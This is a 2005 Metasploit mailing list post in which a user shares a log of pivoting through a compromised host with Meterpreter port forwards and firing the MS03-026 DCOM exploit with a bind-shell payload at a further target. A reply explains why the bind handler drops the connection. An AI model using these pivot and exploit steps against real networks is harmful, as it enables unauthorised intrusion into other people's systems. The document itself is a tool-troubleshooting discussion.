Metasploit mailing list archives

use of meterpreter (copy for the list )

From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 15 Apr 2005 02:14:10 -0500

On Fri, Apr 15, 2005 at 08:58:06AM +0200, Thomas Werth wrote:

Just took a second try, but i'm still doing something wrong :(
Here's "the log" :

1. Hacking "proxy Host"
2. setting up portforwarding
meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 'NextTargetIP' -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 5555 -h 'NextTargetIP' -p 5555
portfwd: Successfully created local listener on port 5555.
meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 'NextTargetIP':135
  127.0.0.1:5555 <-> 'NextTargetIP':5555
3. Launching another instance of metasploit and prepare next exploit

Exploit and Payload Options
===========================

  Exploit:    Name      Default      Description
  --------    ------    ---------    ------------------
  required    RHOST     127.0.0.1    The target address
  required    RPORT     9000         The target port

  Payload:    Name        Default    Description
  --------    --------    -------
------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process",
"thread", "seh"
  required    LPORT       5555       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:32772 <-> 127.0.0.1:5555

[*] Exiting Bind Handler.

maybe i setup proxy for listen Port wrong or something else ?
What do i have to fix ?


My guess is that what's happening is the bind handler is establishing
the connection before you've finished exploiting the host.  What I'd
recommend doing is waiting a few seconds to create the port 5555 port
forward until after the exploit should have completed.  Once it has,
create the port forward on port 5555 and the bind handler should
establish its connection.  Right now this is all kind of kludgey because
it isn't really fully integrated (more of a prototype), but it should
work.  What's happening right now is the bind handler is establishing
the connection to port 5555 immediately (before the exploit even takes
place) which then instructs the meterpreter server to connect to the
target host on port 5555.  Since the exploit hasn't finished, the target
host isn't listening on port 5555 and thus the meterpreter server
returns a failure indication to the client which causes it to close its
half of the port forward for that connection (thus why the bind handler
exits).

Current thread:

use of meterpreter Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)
  - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 19)
    - use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
    - use of meterpreter (copy for the list ) mmiller at hick.org (Apr 20)